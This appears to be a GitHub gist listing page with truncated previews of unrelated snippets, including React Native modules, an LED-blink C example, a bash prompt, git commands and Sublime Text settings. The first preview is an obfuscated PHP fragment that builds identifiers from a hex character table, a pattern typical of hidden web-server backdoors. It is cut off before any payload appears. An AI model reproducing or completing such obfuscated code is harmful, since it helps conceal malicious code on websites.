This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php $GLOBALS['gdfc'];global$gdfc;$gdfc=$GLOBALS;$gdfc['q58f9b']="\x21\x25\x6a\x73\x2a\x6c\x74\x4e\x3b\x71\x56\x28\xa\x3d\x5a\x4b\x38\x60\x76\x29\x70\x57\x35\x32\x39\x4a\x52\x45\x37\x30\x49\x3f\x26\x63\x44\x7c\x58\x20\x69\x9\x62\x3a\x53\x66\x55\x2e\x4d\x65\x4c\x77\x41\x5b\x68\x61\x5f\x59\x72\x6d\x7b\x42\x2b\x43\x5d\x27\x79\x50\x6b\x64\x36\xd\x6e\x47\x75\x5c\x22\x40\x54\x6f\x31\x48\x78\x33\x67\x5e\x51\x2f\x4f\x3c\x46\x7d\x2d\x23\x7a\x34\x24\x3e\x7e\x2c";$gdfc[$gdfc['q58f9b'][3].$gdfc['q58f9b'][24].$gdfc['q58f9b'][22].$gdfc['q58f9b'][22].$gdfc['q58f9b'][28].$gdfc['q58f9b'][78].$gdfc['q58f9b'][68].$gdfc['q58f9b'][40].$gdfc['q58f9b'][33]]=$gdfc['q58f9b'][33].$gdfc['q58f9b'][52].$gdfc['q58f9b'][56];$gdfc[$gdfc['q58f9b'][40].$gdfc['q58f9b'][67].$gdfc['q58f9b'][23].$gdfc['q58f9b'][28].$gdfc['q58f9b'][24].$gdfc['q58f9b'][24]]=$gdfc['q58f9b'][77].$gdfc['q58f9b'][56].$gdfc['q58f9b'][67];$gdfc[$gdfc['q58f9b'][92].$gdfc['q58f9b'][67].$gdfc['q58f9b'][43].$gdfc['q58f9b'][93].$gdfc['q58f9b'][93].$gdfc['q58f9b'][33].$gdfc[' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.truckfly.rctflurry; | |
import com.facebook.react.bridge.ReactApplicationContext; | |
import com.facebook.react.bridge.ReactContextBaseJavaModule; | |
import com.facebook.react.bridge.ReactMethod; | |
import com.facebook.react.bridge.ReadableMap; | |
import com.facebook.react.bridge.ReadableMapKeySetIterator; | |
import com.flurry.android.FlurryAgent; | |
import java.util.HashMap; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package com.yourapp.rctgeolocation; | |
import android.location.Location; | |
import android.os.Bundle; | |
import android.util.Log; | |
import com.facebook.react.bridge.Callback; | |
import com.facebook.react.bridge.ReactApplicationContext; | |
import com.facebook.react.bridge.ReactContextBaseJavaModule; | |
import com.facebook.react.bridge.ReactMethod; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* Copyright (c) 2015-present, Facebook, Inc. | |
* All rights reserved. | |
* | |
* This source code is licensed under the BSD-style license found in the | |
* LICENSE file in the root directory of this source tree. An additional grant | |
* of patent rights can be found in the PATENTS file in the same directory. | |
* | |
* @providesModule GoogleMapView | |
* @flow |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//----------------------------------------------------------------------------- | |
// F31x_Blinky.c | |
//----------------------------------------------------------------------------- | |
// Copyright (C) 2007 Silicon Laboratories, Inc. | |
// | |
// AUTH: JS | |
// DATE: 03 JUL 02 | |
// | |
// This program flashes the green LED on the C8051F31x target board about | |
// five times a second using the interrupt handler for Timer2. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################################### | |
# Prompt | |
################################################################################################### | |
parse_git_branch() { | |
git branch 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/' | |
} | |
black='\['`tput sgr0; tput setaf 0`'\]' | |
red='\['`tput sgr0; tput setaf 1`'\]' | |
green='\['`tput sgr0; tput setaf 2`'\]' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git checkout -b tmpsquash | |
git reset --hard {commit} | |
git merge --squash master | |
git commit | |
git format-patch master |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ "keys": ["j", "j"], "command": "exit_insert_mode", | |
"context": | |
[ | |
{ "key": "setting.command_mode", "operand": false }, | |
{ "key": "setting.is_widget", "operand": false } | |
] | |
}, | |
{ "keys": ["ctrl+alt+a"], "command": "alignment" }, | |
{ "keys": ["ctrl+v"], "command": "paste_and_indent" }, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Show hidden characters
{ | |
"auto_complete_commit_on_tab": true, | |
"bold_folder_labels": true, | |
"caret_style": "phase", | |
"color_scheme": "Packages/User/Monokai (SL).tmTheme", | |
"command": "exit_insert_mode", | |
"context": | |
[ | |
{ | |
"key": "setting.command_mode", |
NewerOlder